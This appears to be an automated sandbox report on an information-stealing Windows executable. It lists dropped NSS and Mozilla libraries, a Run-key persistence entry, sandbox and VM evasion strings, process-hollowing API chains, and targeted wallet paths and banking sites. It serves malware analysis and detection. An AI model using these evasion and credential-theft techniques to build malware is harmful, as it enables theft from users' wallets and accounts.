                          Source: Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                          Source: Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr

                          Data Obfuscation

                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeUnpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00938ADE
                          Source: 7ZthFNAqYp.exeStatic PE information: real checksum: 0x4238d5 should be: 0x506581
                          Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                          Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094F2D2 push ecx; ret 2_2_0094F2E5
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094CE9A push ecx; retf 2_2_0094CE9B
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00942EC9 push esi; ret 2_2_00942ECB
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00952715 push 0000004Ch; iretd 2_2_00952726
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093DF45 push ecx; ret 2_2_0093DF58
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\mozglue.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\nss3.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\msvcp140.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\freebl3.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\vcruntime140.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\softokn3.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditor
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
                          Source: 7ZthFNAqYp.exeBinary or memory string: DIR_WATCH.DLL
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                          Source: 7ZthFNAqYp.exeBinary or memory string: SBIEDLL.DLL
                          Source: 7ZthFNAqYp.exeBinary or memory string: API_LOG.DLL
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,2_2_0092180D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Dropped PE file which has not been started: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe API coverage: 6.5 %
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00930DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00930EC3h2_2_00930DB0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00936013
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00929CF1
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0093547D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0092D59B
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00921D80
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0092B5B4
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00934D08
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0092BF22
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0092B914
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00935B4D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0092CD0C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00935182
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00930F8F GetSystemInfo,wsprintfA,2_2_00930F8F
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeAPI call chain: ExitProcess graph end nodegraph_2-73959
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeAPI call chain: ExitProcess graph end nodegraph_2-73975
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeAPI call chain: ExitProcess graph end nodegraph_2-75313
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0093D1A8
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00938ADE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009214AD mov eax, dword ptr fs:[00000030h]2_2_009214AD
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092148A mov eax, dword ptr fs:[00000030h]2_2_0092148A
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009214A2 mov eax, dword ptr fs:[00000030h]2_2_009214A2
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938726 mov eax, dword ptr fs:[00000030h]2_2_00938726
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00938725 mov eax, dword ptr fs:[00000030h]2_2_00938725
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009310EE GetProcessHeap,HeapAlloc,GlobalMemoryStatusEx,wsprintfA,2_2_009310EE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0093D1A8
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0093DB1C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009477BE SetUnhandledExceptionFilter,2_2_009477BE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CB8AC62

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_0092F51F
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Memory written: C:\Users\user\Desktop\7ZthFNAqYp.exe base: 920000 value starts with: 4D5A
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0093247D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00932554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00932554
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CBD4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6CBD4760
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,2_2_6CAB1C30
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092119E cpuid 2_2_0092119E
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00930DB0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoA,2_2_0094E834
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0094B25C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_0094B3F8
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00949BE0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0094B351
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0094ACD0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0094B453
